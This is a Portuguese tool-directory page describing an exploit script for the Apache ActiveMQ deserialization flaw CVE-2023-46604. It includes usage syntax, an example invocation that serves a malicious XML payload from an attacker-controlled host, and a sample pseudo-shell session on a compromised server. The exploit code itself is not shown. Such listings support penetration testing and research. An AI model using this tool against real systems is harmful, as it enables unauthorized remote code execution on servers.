Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-46604-ActiveMQ-RCE-pseudoshell — Este script aproveita o CVE-2023046604 (Apache ActiveMQ) para gerar um pseudo shell. A vulnerabilidade permite execução remota de código devido à desserialização insegura dentro do protocolo OpenWire. | Kitploit
Ferramentas/GitHubGitHub/duck-sec/cve-2023-46604-activemq-rce-pseudoshell
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubduck-sec/cve-2023-46604-activemq-rce-pseudoshell

CVE-2023-46604-ActiveMQ-RCE-pseudoshell

Este script aproveita o CVE-2023046604 (Apache ActiveMQ) para gerar um pseudo shell. A vulnerabilidade permite execução remota de código devido à desserialização insegura dentro do protocolo OpenWire.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
196há 2 anosAinda não revisado

CVE-2023-46604 RCE Pseudoshell

Este script aproveita o CVE-2023046604 (Apache ActiveMQ) para gerar um pseudo shell. A vulnerabilidade permite execução remota de código devido à desserialização insegura no protocolo OpenWire.

Descrição

CVE-2023-46604 é uma vulnerabilidade de desserialização que existe no protocolo OpenWire do Apache ActiveMQ. Essa falha pode ser explorada por um atacante para executar código arbitrário no servidor onde o ActiveMQ está sendo executado. Um atacante pode criar um arquivo xml malicioso, cujos comandos serão executados pelo servidor remoto.

Este exploit automatiza e abstrai o processo de criação de documentos xml, fornece um servidor básico para entregar o arquivo e recebe informações de volta do servidor alvo via POST. Isso permite exploração contínua sem a necessidade de invocar um reverse shell ou implantar um binário.

Pré-requisitos

Antes de executar o script de exploit, certifique-se de que você tem:

  • Python 3.x instalado no seu sistema.
  • Acesso de rede ao servidor ActiveMQ vulnerável.
  • Permissão para testar contra o servidor vulnerável.

Uso

O script requer:

  • IP ou nome do host do servidor ActiveMQ
  • IP do servidor (um IP no seu sistema, acessível pelo alvo.)

Opcional:

  • Porta do servidor ActiveMQ - padrão 61616
  • Porta do servidor (a porta para iniciar o servidor local) - padrão 8080
root@kitploit:~
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

Exemplo

root@kitploit:~
$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$ 

CVE-2023-46604-RCE.webm

Créditos

Este exploit se baseia no POC original em Go por X1r0z e no POC em Python por evkl1d.

Aviso legal

Este código é fornecido apenas para fins educacionais e de teste de segurança ética. Deve ser usado de forma responsável e apenas em ambientes onde a autorização explícita foi concedida. O uso não autorizado ou malicioso é estritamente proibido. Ao usar este código, você concorda em aderir a todas as leis, regulamentos e padrões éticos aplicáveis em sua jurisdição. Os criadores e contribuidores se isentam de qualquer responsabilidade por quaisquer danos ou consequências decorrentes do uso indevido ou não autorizado deste código.

Baixar ferramenta